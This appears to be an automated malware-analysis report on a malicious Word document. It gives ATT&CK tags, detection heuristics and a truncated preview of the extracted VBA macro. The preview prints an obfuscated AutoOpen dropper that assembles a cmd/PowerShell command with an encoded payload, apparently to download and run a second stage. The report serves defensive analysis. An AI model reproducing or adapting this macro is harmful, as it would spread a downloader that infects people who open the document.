MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Word document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function to execute a PowerShell command. The PowerShell command appears to be encoded, suggesting it's designed to download and execute a secondary payload. The presence of legacy WordBasic markers and the AutoOpen macro indicate a common technique for initial execution in malicious documents.
Heuristics 6
-
ClamAV: Doc.Malware.Valyria-6855449-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6855449-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13631 bytes |
SHA-256: eff47224e855227e5b28a4820810cf0a29a849687c4f3bbcd98876840eaee696 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "WQpssBAARnWDt"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Hour CByte(qQQfG)
Error Hex(76954 + 8274)
Error LCase(99311765)
Hour TwXXRm
Error Fix(PuFOWi - EiVYvn)
Error udIhj
Shell# KeyString(mXoQmJVVnhuKX + iWNHEpSAuc + vbKeyC + VtuGkdM + ksEZYXf) + FtoiGRrpXwUWun + AcsbKhK + jEjtN + HwmPfRBJ + MqkiAl + wZdlqbkdwv + EzwWEtli + hkPtJqjApc + ijSMoIQ + OGAcH + GFHMWY + IGnWGWX + ipQMoiIrfi + QwmNoPLPcwcjEY, 885877239 - 885877239
Error WwNMw
Hour VaojmN
Error TimeValue(9618)
End Sub
Attribute VB_Name = "ftojjKGYuWwmM"
Function jEjtN()
On Error Resume Next
Hour 19
Error AdVks
UZnpcA = "m" + "d" + " " + " " + " " + " " + "/v " + " " + " " + " "
Hour Str(942)
Error Sgn(8)
Error 3
vssljCwErvl = " /C" + " " + " " + " " + " " + " " + " " + " " + CStr(Chr(vmjCOjPqNIK + qnCIvwbIcqmkz + 34 + dnhTmDuCKjhwV + UvGPEDPcr)) + " " + " " + " " + " Se"
Error LCase(MuzIGZ)
Hour CCur(zPksVB)
Error Hex(650)
wRwDjDa = "t " + " " + "\ " + " " + "='o" + "wer" + "s" + "h" + "el"
Hour 1363
Hour CDate(13)
SSozq = "l " + "-e " + "J" + "ABD" + "A"
Error CDec(40512 * JMdMsW)
Hour 130
SHNtKuXdz = "H" + "QA" + "S" + "QA" + "9A"
Error 2145
Hour LCase(268386464)
Hour 1
GlKFqXjzGP = "G4" + "A" + "ZQB" + "3" + "A" + "C0"
Error CDate(INScn - soiWcl)
Error CCur(95387 / zaAPJ)
mTONwOrVFJD = "Abw" + "BiA" + "Go" + "AZ" + "QBj" + "AH" + "QA," + "A" + "B"
Hour 3
Error 935
BfFFQP = "OA" + "GU" + "AdA" + "A/A" + "Fc" + "AZQ"
Hour CVar(wZlITu)
Error Str(1)
HjJSTdYDj = "B" + "iAE" + ":A" + "bA" + "B" + "'" + "AGU"
Hour CDbl(kGrik)
Hour Hex(Xchjz)
Error Cos(740)
bJQAvwRB = "Ab." + "B0" + "ADs" + "AJ" + "A" + "B" + "/AF" + ".AU" + "QA9"
jEjtN = UZnpcA + vssljCwErvl + wRwDjDa + SSozq + SHNtKuXdz + GlKFqXjzGP + mTONwOrVFJD + BfFFQP + HjJSTdYDj + bJQAvwRB
Hour 5976
Hour wLTlwI
Hour 1693
End Function
Function HwmPfRBJ()
On Error Resume Next
Error Hex(7)
Error CDate(4925)
Hour Val(5602 * 50523 / 4314 / zidzaz)
mGinvXrjFT = "AC" + "cAa" + "AB0" + "A" + "HQA" + "cA" + "A6" + "AC" + "8A("
Hour CVar(owahiZ * JspiS)
Hour HZDGPp
aVpEVRvzF = "wB{" + "A" + "G8A" + "cAB" + "vA" + "H,A" + "d" + "A" + "Bl" + "AG"
Error Log(NEmDO)
Error 20455182
DoLXtdzU = "sA" + "(" + ".Bj" + "AGw" + "A("
Error CCur(5)
Hour rrjQia
Error Log(76)
mNzaZ = "w" + "BGA" + "E" + "EA" + "bQ" + "A0" + "AG" + "U" + "AW" + ".B" + "Z"
Error CDicj
Hour hRpCWw
Hour Month(25941 + ZwvXKo)
QjfFvMEkJk = "A" + "E" + "A" + "A" + "aA" + "B" + "0" + "AH"
Hour Rnd(RhQJOs)
Hour ftJPAW
Error 1
tQsjf = "QA" + "cAA" + "6AC" + "8" + "A" + "(" + "w" + "B" + "{AH" + "kA" + "b" + "wB/"
HwmPfRBJ = mGinvXrjFT + aVpEVRvzF + DoLXtdzU + mNzaZ + QjfFvMEkJk + tQsjf
Hour Log(35202 - CoNTq)
Error 8095
End Function
Function MqkiAl()
On Error Resume Next
Error RdjuPK
Hour kEzzFo
Error 9
qVcjMTnX = "AG" + "U" + "A" + "b" + "."
Error MjREZ
Error Fix(3796 / KIrJJi * 77009 * SZTzZi)
Hour CDbl(420644026)
psoksG = "B}" + "A" + "H" + "U" + "A" + "bQB" + "wA" + "C" + "0A" + "Z." + "B"
Hour Second(292)
Hour tlYmi
HrtLJzfAiTd = "1AG" + "4A" + "(.B" + "jA" + "G" + "8" + "Ab" + "QAv" + "A" + "FQA" + "NwB" + "AA" + "G"
Hour CCur(intuoU)
Error 2
SOOwsZ = ".A" + "dAB" + "0AH" + "AA" + "O.A" + "vA"
Error CDate(XQXGBP)
Hour Month(sfKzN)
Error VwdHP
PwXzwwHiUKu = "C" + "8" + "A" + "dAB" + "mAG" + "0Ax" + "QBr" + "AG" + "U" + "A"
Hour Log(5)
Error 64
Hour 527846016
RZPnnsPm = "dQ" + "BwA" + "C4A" + "xw" + "B" + "v" + "A"
Error TypeName(CAtrWT)
Error 435074393
Error Round(NRuzni - JVPiI / aOYEP * lKWiRN)
VViIFSSmr = "G0A" + "(w" + "BE" + "AE" + "AA"
Error CDbl(jXzzJc)
Error Tan(NKiwTB + szzov / 93678 + WKKhr)
zjBXoJwSzT = "a
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.